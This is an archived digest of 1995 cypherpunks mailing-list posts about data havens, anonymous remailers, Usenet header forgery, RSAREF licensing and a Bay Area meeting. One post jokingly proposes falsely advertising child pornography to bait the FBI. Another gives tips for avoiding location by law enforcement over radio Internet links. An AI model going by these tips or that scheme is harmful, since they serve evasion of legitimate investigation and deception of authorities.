From: daleh@ix.netcom.com (Dale Harrison (AEGIS))
Date: Tue, 10 Jan 95 08:27:05 PST
To: cypherpunks@toad.com
Subject: DataHavens
Message-ID: <199501101626.IAA19511@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


If one wonders what sort of physical threat an operator of a datahaven 
could potentially face, then today's (01/10/95) Wall Street Journal 
editorial is must reading.  It's on the Op-Ed page (page A20) and is 
titled: "No Accountability at the FBI".  It discusses the Randy Weaver 
siege in 1992 and the subsequent investigation and whitewash that 
followed.  It's scary stuff!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Tue, 10 Jan 95 08:44:22 PST
To: cypherpunks@toad.com
Subject: Re: Fwd: Re: netcom discussion in news.admin.misc
In-Reply-To: <199501100351.TAA05721@ix3.ix.netcom.com>
Message-ID: <199501101633.IAA07416@netcom19.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


johndix@ix.netcom.com (John Dix) writes:

 > I've mentioned to Netnews that a good first step would be to
 > make it harder to forge messages by changing the news
 > software to no longer accept a user-supplied "Sender:" line
 > in the article header, and he has agreed.  However, I fail
 > to understand just *what* is taking so long to make this
 > (much needed) change.

The problem here is that the news transport mechanism is not
particularly resistant to arbitrary text being posted by a user.
Newsreaders can check for forged "From:" or "Sender:" lines, but
newsreaders then call shell scripts like inews and injnews to
process their material.  Users can call these scripts directly
and bypass any checks by the newsreader.  None of this requires
any special privs, and only the lowest level of the news
transport mechanism, relaynews, requires set-user-id netnews to
function.

The latest version of Tin does check for forged "From:" lines,
but the version Netcom runs allows anything to be posted.

Fudging the lower levels of the news transport mechanism to check
"From:" and "Sender:" lines can mess up other things, since
processes may need to inject news into the news stream which they
themselves did not author.

One solution to the problem is to have a secure level of the news
transport mechanism add an "Originator:" line to every message
which it handles. This will identify users attempting forgeries,
and will not require munging of an existing header line.

-- 
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Tue, 10 Jan 95 08:47:54 PST
To: cypherpunks@toad.com
Subject: Re: Julf gets some negitive press!!!
In-Reply-To: <Wmc4lKjqRuy3075yn@mirage.skypoint.com>
Message-ID: <199501101646.IAA09037@netcom19.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


skaplin@mirage.skypoint.com (Samuel Kaplin) writes:

 > bitch Siegel is complaining about net hoods again, ...

 > Such problems are further exacerbated by a computer in
 > Finland called the Anonymous Server, which exists for the
 > sole purpose of laundering computer messages, much like
 > dirty money is laundered through small island nations.

I predicted a while back, that when the time came for a serious
attack by authority types on anonymous remailers, we would see
the term "message laundering" suddenly spring into the public
lexicon.

 > Consequently, if you want to, say, threaten someone with
 > death, your risk of retribution is small, courtesy of the
 > Anonymous Server.

Well, I certainly wouldn't post death threats through Penet. At
the very least, it would threaten the existance of the server,
which is a valuable net.resource, and cause me to receive nasty
mail from Julf.  I think Bitch Siegel exaggerates the potential
danger of this particular system.

-- 
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Avi Harris Baumstein <avi@clas.ufl.edu>
Date: Tue, 10 Jan 95 06:18:11 PST
To: cypherpunks@toad.com
Subject: Re: Data Haven problems
In-Reply-To: <199501100125.TAA29250@pentagon.io.com>
Message-ID: <199501101418.JAA08782@cutter.clas.ufl.edu>
MIME-Version: 1.0
Content-Type: text/plain


dfloyd@io.com writes:

>My problem is not that people will bitch about my DH.  My problem will
>be arfholes or yellow journalists uploading K*dd*e p**n to my DH, then
>making a long report how I cater to p*dofiles and other evil denezins
>that pop from time to time.  Then, I get the police knocking at my
>door, asking me to come to Club Fed for a looooonnnggg vacation.

well i remember a suggestion a while back to only accept encrypted
files. i don't remember who made the suggestion, but this seems like a
good idea for several reasons:

1) most journalists won't know how to encrypt their files (ok, this is
an admittedly short-term advantage, as journalists get smarter)

2) you will have no idea *what* is stored, and absolutely no way of
finding out, even if you wanted to. you should advertise this feature
widely. 

3) it will help promote the use of crypto, as those who want to use
the DH will have to have a way to encrypt their files.

and charging, even an extremely minimal fee, will help to reduce
wanton usage. but then you get into the whole electronic payment
infrastructure problem again...

-avi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Tue, 10 Jan 95 09:33:17 PST
To: cypherpunks@toad.com
Subject: Anarcho-Cap - Newt and Gorby?
Message-ID: <199501101733.JAA21222@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


##
From: sherbock@remailer.net

-----BEGIN PGP SIGNED MESSAGE-----

Crypto-anarchy, many-to-many communications, inter-
national/cultural communications, bandwidth price plummet,
computer ubiquity, philosophical/ideological evangelism, freedom
of speech/trade/association and other factors talked about on
this list are together heralding huge transformations.  With
this as background together with the statement that I am somewhat
of a "Frissell/Sandforth Optimist," let me present a short essay
and ask a single political question.

I want to propose that a change to more of a Snow Crash society
with anarcho-capitalism as the norm is not necessarily being
_caused_ by pressures listed above, but, rather, fit a grander
historical destiny.  What we are seeing and will see in the
information age has been bound to happen all along.  It is an
inevitable follow-on phase to our industrial age.  One way to
view our (Cypherpunks) work is "lead, follow or get out of the
way."  What's happening is going to happen.  I just want to be
in the center of it!  (I could write much more in support of
this.  Read Gilder, Rees-Mogg, etc. and much of the techno
Sci-Fi suggested by Cypherpunks.)

Hindsight is 20/20.  Many experts have analyzed the collapse of
the USSR.  Many are quick to claim that the dissolution was
inevitable, historical, even.

Consider the possibility that the dissolution of large,
centralized federal republics is also inevitable.  (The
Frissel/Sandforth Optimists have been arguing this exact point.)

As an interesting specific, consider parallels in the roles of
former Soviet leader Mikhail Gorbachev and the U.S. House Speaker
Newt Gingrich.

Gorbachev, by self-proclamation, was a communist first and
foremost.  He was in no way a destructionist.  In fact, it can be
argued that he never intended to weaken the central power of the
Supreme Soviet.  He introduced liberalization reform
(parestroika?) with the intent only of heading off the foreboding
economic collapse of his State.  Gorbachev's reforms were little
baby walking steps in a direction that the Bear already was
poised to _run_.

Mr. Gingrich is a REPUBLICan.  From what I can see, he loves the
Constitutional government process of the United States.  His
proclaimed intentions are for downsizing and deregulation.
However, he does not seem to desire the dissolution of federal,
central government.  He has not openly claimed to be
libertarian or anarcho-capitalistic.  :)

Will Newt's deregulatory reforms be baby walking steps in the
direction Uncle Sam (and the world) is already poised to _run_?

G. del Sherbock


- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQBNAy8RoncAAAECAK5jkuO+3qNE4veGXrwKqgJs9GhJibpNBOOacLN/OueiDX4R
w0+fvCNCwIGT49T6acJvgSb/Kej3BcJViw4fkRUABRG0D0cuIGRlbCBTaGVyYm9j
aw==
=RPy1
- -----END PGP PUBLIC KEY BLOCK-----

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBLxKvjAXCVYsOH5EVAQEXHQH+IT6n/vth2UcQrhJ9faEn8nfwU/XA/OyL
3qfXso1b7/NoivfSiuAvI8wQHasXQsWOheSwTE9c/TI7w6gAX4Yltw==
=TJqU
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: storm@marlin.ssnet.com (Don Melvin)
Date: Tue, 10 Jan 95 07:37:43 PST
To: cypherpunks@toad.com
Subject: Re: Rumored CBS "hit" on internet coming
In-Reply-To: <199501091955.LAA07671@netcom18.netcom.com>
Message-ID: <y5g4lKJXYLEI075yn@ssnet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


In article <199501091955.LAA07671@netcom18.netcom.com>, you wrote:
> 
> Argghh!! When Connie interviewed me last week, she said I could
> _whisper_ some dark uses to her and it would just be between the two
> of us!
> 
> Life's a bitch, and so is Connie.

I believe the current PinC expression should be
        Life's a Hillary, and so is Connie


- --
America - a country so rich and so strong we can reward the lazy 
          and punish the productive and still survive (so far)

Don Melvin                  storm@ssnet.com                finger for PGP key.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLxKh7mvyi8p8VUiJAQHxmQP/UP733aoSsBqI23NR1p6A4Gcl79VT8Dvc
cC4MpxRQZwe0w2dx7jNMpXNJY5iwMOwpXNkfY/SEX0iyGXL0B8kjHLOYJkhtOZMA
5PyPqU8fbskKz5xXd/kBeTtZmnVzi4eMFYczm4+ThWlwzEoka5PATP3pa2SSXwmc
rCGsnPDuJQA=
=V+K/
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Tue, 10 Jan 95 10:11:37 PST
To: cypherpunks@toad.com
Subject: RSA Licenses Commercial Distribution Rights to RSAREF (URLs to PressRelease)
Message-ID: <199501101810.KAA26946@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


I've been waiting for this, for oh, about two years now.

Eric
-----------------------------------------------------------------------------

RSA Licenses Commercial Distribution Rights to RSAREF
=====================================================
  RSA announces that it is licensing commercial distribution
  rights of its RSAREF software to Consensus Development, allowing
  for implementation of commercial Privacy Enhanced Mail (PEM)
  applications.


Press Release
--------------
  REDWOOD SHORES, CALIFORNIA--JANUARY 9, 1995--RSA Data Security,
  Inc. and Consensus Development Corporation jointly announce today
  at the RSA Data Security Conference that Consensus Development is
  licensing the commercial distribution rights of RSAREF from RSA
  Data Security.

  RSAREF (pronounced "R.S.A. reff") is short for "RSA reference
  implementation" and is a cryptography source code toolkit designed
  to allow developers to create PEM (Privacy-Enhanced Mail)software
  and other encryption/authentication tools. Until now, RSAREF has
  been an unsupported RSA product approved for use only as part of
  freeware and not-for-profit software applications.

  Consensus Development will now be able to market and license RSAREF
  to commercial software developers, and provide software support and
  future enhancements to the RSAREF source code library.

  (continued in full text press release...)


Full Text
---------
  A World-Wide-Web/Mosaic page for this press release can be found at:
    <URL=http://www.consensus.com:8300/RSAREF-PR.html>

  A digitally signed text copy of this press release can be found at:
    <URL=ftp://ftp.consensus.com/pub/consensus/pr/RSAREF-PR.txt>


Discussion/Announcement List
----------------------------
  Consensus Development will be creating an email discussion list for
  software developers interested in RSAREF. To join the discussion,
  send a message to <listproc@consensus.com> with the body of the
  message requesting "subscribe RSAREF-DEV-L firstname lastname".




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nesta Stubbs <nesta@nesta.pr.mcs.net>
Date: Tue, 10 Jan 95 08:51:29 PST
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: Data Haven problems
In-Reply-To: <199501101418.JAA08782@cutter.clas.ufl.edu>
Message-ID: <Pine.3.89.9501101025.B12534-0100000@nesta.pr.mcs.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 10 Jan 1995, Avi Harris Baumstein wrote:

> dfloyd@io.com writes:
> 
> >My problem is not that people will bitch about my DH.  My problem will
> >be arfholes or yellow journalists uploading K*dd*e p**n to my DH, then
> >making a long report how I cater to p*dofiles and other evil denezins
> >that pop from time to time.  Then, I get the police knocking at my
> >door, asking me to come to Club Fed for a looooonnnggg vacation.
> 
> well i remember a suggestion a while back to only accept encrypted
> files. i don't remember who made the suggestion, but this seems like a
> good idea for several reasons:
>
I like this too, it keeps the data safe not only in transit, but also on 
the site itself.  So I don't have to re-encrypt files, they are alredy 
crypted, and signed(another good bonus) by the sender or account holder.
 
> 2) you will have no idea *what* is stored, and absolutely no way of
> finding out, even if you wanted to. you should advertise this feature
> widely.

depends on how it is encrypted, if they encrypt it too the datahaven, 
using your public key, that argument won't work, BUT if they are suing it 
as a anon drop box, then they can encypt it to another publik key of the 
recipient(an anon key of course) and oyu would never be abl to read it.  
This is a good feature of a data-haven, one that may be able to produce 
profit int eh future if tha is a motive.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: RGRIFFITH@sfasu.edu
Date: Tue, 10 Jan 95 08:52:58 PST
To: cypherpunks@toad.com
Subject: procmail: another question
Message-ID: <01HLOG4V1I1E00106V@TITAN.SFASU.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Please excuse my ignorance, but will procmail run under DOS?  Will it
download mail from a PopMail server?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Tue, 10 Jan 95 07:59:27 PST
To: db@Tadpole.COM
Subject: Re: for-pay remailers and FV
In-Reply-To: <21043.789692792.1@nsb.fv.com>
Message-ID: <Yj4eu470Eyt5AxI4Vq@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from fv: 9-Jan-95 Re: for-pay remailers and FV db@Tadpole.COM (2073*)

> Also, there is no reason on earth to take FV for payment under
> such a scheme,

No reason on Earth?  Try any of the following:

1.  You can actually get paid, in real money, using a system that is
operating NOW. 

2.  It requires no special software for the user of the remailer
service, thus preserving a very positive feature of most of today's
anonymous remailers.

3.  You don't need to have a credit card merchant account (and the
technical arrangements for using it) in order to run a remailer service.

There are more, but those are probably the top three.

> I don't see any reason to get FV involved, unless one were so lame 
> as to be unable to get signed up directly with the credit card 
> companies as a merchant -- a process of appropriate complexity
> to indicate the posession of at least one (1) clue, which is prob.
> desirable in someone who's going to be handling remailer finances

Well, I could be wrong, but from the above paragraph I can only infer
that you've never actually tried to set yourself up as a merchant.

The hardest part is getting approved for a merchant account.  Unless you
already have an established business or money in the bank, this will
*probably* be a showstopper if you want to set up a remailer-for-pay
service.  Getting a merchant account is never trivial, and getting one
in a whole new industry is VERY hard.

Once you have a merchant account, establishing the right technical setup
to do the actual authorization and purchases is not rocket science, but
it certainly requires more than "1 clue" -- in particular, it typically
requires hooking up some special hardware, installing and configuring
some new software, and some serious thought about the implications for
your system's security.

None of this is needed if you use FV.

Also, as Paul pointed out, the requirement for reversibility applies to
ANY credit-card-based service, not just FV.  This is NOT an option, it
is required by law (reg Z).

Excerpts from fv: 10-Jan-95 Re: for-pay remailers and FV
Hal@shell.portal.com (2603)

> Perhaps you could charge some small amount for them, but require VISA
> payment, and check the names on the VISA cards.  (This doesn't hurt
> anonymity when the tokens are actually used because of the blinding.)  To
> get multiple tokens a person would have to commit some serious real world
> name trickery, a considerably higher barrier than making up a pseudonym
> on the net.

This is workable.  It also reinvents a big chunk of what FV does, if you
do it yourself. -- NB




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Tue, 10 Jan 95 11:27:40 PST
To: Adam Shostack <adam@bwh.harvard.edu>
Subject: Re: procmail: another question
In-Reply-To: <199501101826.NAA15838@hermes.bwh.harvard.edu>
Message-ID: <Pine.3.89.9501101110.A28938-0100000@netcom5>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 10 Jan 1995, Adam Shostack wrote:
> 	Procmail is a very versatile, relatively easy to use way of
> processing mail.

"Relatively easy"  -- Relative to the usual venomous Unix 
user hostile interface that is.   I use procmail, but my 
local Unix guru does not, even though he has a clear need to do so.

>  Its most obvious function is to put mailing lists
> into one or several folders, but it also can be made into a file
> server*, automatically retrieve PGP keys, act as a basic remailer,
> etc, etc.

The .procmailrc file is in effect a program, rather than
a bunch of flags.

Every time procmail receives a message it interpretively 
executes this program, which does a pattern match on the mail, if
it gets a match, passes the mail to some external program,
which may be yet another invocation of procmail executing
a different .rc file.

Now if us windows folk had done it, we would have done
it as visual basic controls and we would have created
an installation program.  Still I must 
confess, we windows folk have not done it and the unix folk have
done it, so I guess it is score 1 for unix, 0 for
windows.

But I guarantee the chairman of the board is not going
to use procmail.

 ---------------------------------------------------------------------
We have the right to defend ourselves and our
property, because of the kind of animals that we    James A. Donald
are.  True law derives from this right, not from    http://nw.com/jamesd/
the arbitrary power of the omnipotent state.        jamesd@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christopher Allen <ChristopherA@consensus.com>
Date: Tue, 10 Jan 95 11:25:32 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: RSA Licenses Commercial Distribution Rights to RSAREF (URLs to Press
Message-ID: <v02110100ab388eaa8123@[198.68.251.11]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:21 AM 1/10/95, Adam Shostack wrote:
>        Its just another example of RSADSI trying to act more like a
>government agency. :)

I hope not -- one thing that I'm trying to do by taking over support for
RSAREF is make it much more responsive to what developers demand. Like you
I was disappointed by the slow progress of RSAREF, so that is why I worked
so hard to get this deal going.

------------------------------------------------------------------------
...Christopher Allen                  Consensus Development Corporation..
...<ChristopherA@consensus.com>                   4104-24th Street #419..
...                                        San Francisco, CA 94114-3615..
...                                        o415/647-6383  f415/647-6384..
...Mosaic/WWW Home Page:                                               ..
...Consensus Home Page    ..






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Rogaski <rogaski@phobos.lib.iup.edu>
Date: Tue, 10 Jan 95 08:29:28 PST
To: cypherpunks@toad.com (Cypherpunks)
Subject: HTTP and ID Verification
Message-ID: <199501101629.LAA05969@phobos.lib.iup.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Can anyone tell me what the URL for the site that displays all
the identifying info it gets when you request it is?



- -----
Doc					      doc@phobos.lib.iup.edu
aka Mark Rogaski			      http://www.lib.iup.edu/~rogaski/

Disclaimer:  You would probably be hard-pressed to find ANYONE who agrees
             	with me, much less my university or employer...

   [finger fllevta@oak.grove.iup.edu for PGP Public Key and Geek Code v2.1]


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLxK1yB0c4/pqJauBAQHjjgP/VsewWr3MtyULjeb1H1SF7FEHBLK4rtML
dHEGG88AOPI4C6shO/xpn7fauZM4serMt2OkXXoXcKjc4DXXnrRB23NUhWXXwEBl
iIWucy4p6FEBzKLPv3ulmNRzl+JBsKvNdFTVvYiutFmagA1W/t9WCon+p1eEurnK
LlBNqcnL+Rk=
=DdD8
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com (Russell Nelson)
Date: Tue, 10 Jan 95 08:30:24 PST
To: cypherpunks@toad.com
Subject: Re: for-pay remailers and FV
In-Reply-To: <Yj4eu470Eyt5AxI4Vq@nsb.fv.com>
Message-ID: <m0rRjZU-0008ZFC@crynwr.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


   Date: Tue, 10 Jan 1995 10:57:56 -0500 (EST)
   From: Nathaniel Borenstein <nsb@nsb.fv.com>

   The hardest part is getting approved for a merchant account.

I've tried.  Nathan is right.

   Also, as Paul pointed out, the requirement for reversibility applies to
   ANY credit-card-based service, not just FV.  This is NOT an option, it
   is required by law (reg Z).

But if you sell services or information, this is not a really big
problem.  You just say "fuck it, I got screwed", and you reverse the
charges.

And as for anonymity/privacy, if the business is doing a lot of other
transactions, and the remailer ones are mixed in, then who's to say
who's who?  Maybe it's time to remind people that there is no such
thing as perfect security, only varying degrees of such.

-- 
-russ <nelson@crynwr.com>    http://www.crynwr.com/crynwr/nelson.html
Crynwr Software   | Crynwr Software sells packet driver support | ask4 PGP key
11 Grant St.      | +1 315 268 1925 (9201 FAX)  | What is thee doing about it?
Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com (Russell Nelson)
Date: Tue, 10 Jan 95 08:34:48 PST
To: cypherpunks@toad.com
Subject: DH testing
Message-ID: <m0rRjdn-0008ZFC@crynwr.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


A DataHaven is only as good as it's been tested.  You could pay for a
tiger team to attack it, but why bother?  Just take some nudie
pictures of a girl >=18 years old who looks <18 years old, announce
publicly that you have kiddie porn for sale, sit back and let the FBI
test your DH for free.  Be sure to charge enough for your eventual
legal defense...

-- 
-russ <nelson@crynwr.com>    http://www.crynwr.com/crynwr/nelson.html
Crynwr Software   | Crynwr Software sells packet driver support | ask4 PGP key
11 Grant St.      | +1 315 268 1925 (9201 FAX)  | What is thee doing about it?
Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com (Russell Nelson)
Date: Tue, 10 Jan 95 08:42:02 PST
To: cypherpunks@toad.com
Subject: "safe" Internet access
Message-ID: <m0rRjkq-0008ZFC@crynwr.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


If you want to access the Internet in a way that doesn't reveal your
physical location (much), buy access from Metricom.  They sell
Internet access via radios.  A small part-15 (900Mhz) $500 radio modem
is needed, plus a few dozen bucks/month (thereabouts).  If you use a
yagi antenna, that will reduce your emissions to mostly one direction.
If you're in line-of-sight with one of their poletops, you can point a
telescope in that direction, and transmit only when you *don't* see a
truck bristling with antennas.  Every radio has a serial number, and
they record who's got what, so they could cut you off much, much
easier than catching you.

For more information, see <http://www.metricom.com>.

Same thing can be done with radiomail, but the speed is slower and the
radios and service are more expensive.  And, they can still cut you off.

Of course, part-time connectivity is problemmatic, because you need to
receive mail at all times.  Of course, you could use a mail hub in a
"safe" country, but then you're tied to a government again.

-- 
-russ <nelson@crynwr.com>    http://www.crynwr.com/crynwr/nelson.html
Crynwr Software   | Crynwr Software sells packet driver support | ask4 PGP key
11 Grant St.      | +1 315 268 1925 (9201 FAX)  | What is thee doing about it?
Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: erc@s116.slcslip.indirect.com (Ed Carp [khijol Sysadmin])
Date: Tue, 10 Jan 95 13:07:42 PST
To: nelson@crynwr.com (Russell Nelson)
Subject: Re: "safe" Internet access
In-Reply-To: <m0rRjkq-0008ZFC@crynwr.crynwr.com>
Message-ID: <m0rRlfc-0004IkC@s116.slcslip.indirect.com>
MIME-Version: 1.0
Content-Type: text


> Of course, part-time connectivity is problemmatic, because you need to
> receive mail at all times.  Of course, you could use a mail hub in a
> "safe" country, but then you're tied to a government again.

If you batch your email and news using UUCP, you don't need to be connected
all the time.  And it can also be encrypted...
-- 
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager

Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi
                       ** PGP encrypted email preferred! **

"What's the use of distant travel if only to discover - you're homeless in
your heart."  --Basia, "Yearning"



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jef Poskanzer <jef@ee.lbl.gov>
Date: Tue, 10 Jan 95 11:58:51 PST
To: "Bradley W. Dolan" <71431.2564@compuserve.com>
Subject: Re: Why is WELL down?
Message-ID: <199501101958.LAA07295@hot.ee.lbl.gov>
MIME-Version: 1.0
Content-Type: text/plain


>My favorite net access provider, the WELL, is down and I can't
>get a straight answer from the normally frank WELL folks why.

Is that sarcasm?

"Never attribute to malice what can be explained by simple stupidity."
---
Jef




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Tue, 10 Jan 95 13:18:28 PST
To: cypherpunks@toad.com
Subject: MEETING: Jan. 14th Bay Area Cypherpunks Meeting
Message-ID: <ab3820b50302100417b7@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


ANNOUNCEMENT
============

This month's Bay Area Cypherpunks Meeting will be held this Saturday,
January 14th, from 12 noon until 6 pm in Silicon Graphics Cafe Iris, the
usual place and time. Detailed directions are at the end of this message.

The topic:

                        Demonstrations

The emphasis will be on hands-on, live demonstrations of items of interest.
Several speakers will demonstrate products and tools on actual machines.

I encourage eating, shmoozing, and general milling-around to be finished by
12:30 at the latest, so we can start discussion of general items, updates,
etc. I'd really like to get the demos started by 1 p.m., and 1:30 at the
latest. We have a lot of demos planned and some special visitors in town
this week, and some special events that just happened. So, as I'm the
rotating chairentity this month, I'll wield the gavel ruthlessly.

The RSA Data Security Inc. annual conference happened this past week, so I
expect several folks will want to provide updates and news announcments,
e.g., the licensing of RSAREF, status of lawsuits, new results, etc.. Short
updates are good, but we just don't have the time for this meeting to
formally present recaps of interesting papers. If there were any *amazing*
results, they'll surely keep for a future meeting for more detailed
discussion (could be a theme for a meeting).

Also, Phil Zimmermann may be at the meeting (he's scheduled), so hearing
from him could easily soak up a couple of hours, which we just don't have.
In fairness to those who've planned demos, we'll have to try to limit all
these interesting folks to the first hour or so. Maybe a few minutes more.
And maybe later in the day there'll be time.

We have these demos planned.

* Henry Strickland (Strick) will, in his words, "be demoing Skronk
(transparent above-the-kernel encryption for TCP/IP) and Kudzu (the TCL
toolkit)."

* Jack Repenning of SGI will demo two interfaces. In his own words, "I'm
planning to demo two interfaces, actually: the Emacs one (on an Indy),
and the MCIP "MacPGP Kit" plus Eudora extensions, on a Mac."

* Phil Zimmermann "will demo pgp 2.9 and possibly voice pgp," according to
Katy Kislitzin, who is in contact with Phil.

* Katy Kislitzin will bring up the "demo smosaic" she has. (Secure Mosaic.)

* Raph Levien will demonstrate "premail," his remailer-chaining tool.

* Other ad hoc demos of items of interest may happen. We'll have several
machines set up, so those with interesting software or hardware can perhaps
do some brief, unscheduled demos.

If I left anyone out, anyone who sent me e-mail saying they wanted to demo,
I apologize. I went back over my mail and these were the folks I found
who'd sent me e-mail.

Contact me at my normal e-mail address (tcmay@netcom.com) as soon as
possible if you want to be added. (I'll be travelling to LA on Friday, for
a television interview with the BBC on crypto, and so will be unwired that
day.)

The emphasis is on hands-on demos, to expose folks to tools,
capabilitities, possible future products. Informality is fine.

NOTE TO PRESENTERS: Make arrangements to have machines you'll need there.
An SGI Unix machine is permanently in the room. Other machines will have to
be brought. Because of my trip to LA on Friday, I doubt I'll be bringing my
PowerMac 7100AV with me, but I will have a PowerBook 170 laptop Macintosh,
if all else fails. Windows and DOS demo folks should bring their machine of
choice.

(Atari, Cromemco, Amiga, Altair, and Exidy Sorcerer users are of course on
their own.)

The overhead video system is often more trouble than its worth, but it will
be available for at least some of the demos. Those wishing to tie into
should have either RGB outputs from their machine, or NTSC composite video.
I'll bring my Hi-8 camcorder, which can tie in, and thus allow me to zoom
in on whatever machines are there and display the video on the overhead
screen.

Dinner plans will, as usual, be made in the last chaotic moments of the meeting.

-----------------------------------------------------------------------------
DIRECTIONS:

  Silicon Graphics, Inc.
  Building 5 (SGI Cafeteria)
  2025 North Shoreline Boulevard
  Mountain View, CA

From 101 take Shoreline East.  This is towards Shoreline Amphitheatre.
It's also "logical east", and points more north that east.  (That is,
it's east with respect to 101 North, which points west near the exit.)
If you're coming in on 101 South, you'll cross over the bridge.

Continue on Shoreline and go past a whole bunch of other SGI
buildings.  Turn right onto Steirlin Court at the big red metal
sculpture.  There will be even more SGI buildings surrounding
you--take note of the building numbers.  Go almost to the end of this
street.  Building 5 is on the right.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Tue, 10 Jan 95 10:19:52 PST
To: eric@remailer.net (Eric Hughes)
Subject: Re: RSA Licenses Commercial Distribution Rights to RSAREF (URLs to Press
In-Reply-To: <199501101810.KAA26946@largo.remailer.net>
Message-ID: <199501101821.NAA15802@hermes.bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



	Its just another example of RSADSI trying to act more like a
government agency. :)

Adam


| I've been waiting for this, for oh, about two years now.
| 
| Eric
| -----------------------------------------------------------------------------
| 
| RSA Licenses Commercial Distribution Rights to RSAREF
| =====================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Tue, 10 Jan 95 10:23:52 PST
To: RGRIFFITH@sfasu.edu
Subject: Re: procmail: another question
In-Reply-To: <01HLOG4V1I1E00106V@TITAN.SFASU.EDU>
Message-ID: <199501101826.NAA15838@hermes.bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


You wrote:

| Please excuse my ignorance, but will procmail run under DOS?  Will it
| download mail from a PopMail server?

	Procmail will run on the UNIX system that you connect to via
pop.  It processes mail, it doesn't transport it.  (It can, of course,
hand mail off to an MTA.)

	Procmail is a very versatile, relatively easy to use way of
processing mail.  Its most obvious function is to put mailing lists
into one or several folders, but it also can be made into a file
server*, automatically retrieve PGP keys, act as a basic remailer,
etc, etc.


Adam

*RTFM: procmailex(5)

-- 
"It is seldom that liberty of any kind is lost all at once."
						       -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John.Schofield@sprawl.expressnet.org (John Schofield)
Date: Tue, 10 Jan 95 21:18:55 PST
To: cypherpunks@toad.com
Subject: Keep Out Electronic Availability Announcement
Message-ID: <4bc_9501101432@expressnet.org>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

                               Keep Out
                  The Journal of Electronic Privacy
                           January 10, 1995


    ** Keep Out Volume 1, Number 2 now available electronically **
            ** Keep Out Volume 2, Number 1 coming soon **
                  ** FREE sample issues available **


I am pleased to announce the electronic availability of Volume 1,
Number 2 of Keep Out, the Journal of Electronic Privacy.

To receive a copy, simply send e-mail to
keep-out-current@expressnet.org.  The subject and body of the message
do not matter.  You will receive an ASCII-text copy of the issue in
reply to your message.  You can also do a Fidonet file request to
1:102/903 and request VOL1-NO2.TXT, or call the Sprawl BBS at
+1-818-342-5127 and download it.

Volume 1, Number 2 had stories on the Pretty Good Privacy (PGP)
signature bug, a how-to story on anonymous remailers, an interview
with remailer operator Erich von Hollander, and of course, a
continuation of our PGP beginners' series with an introduction to
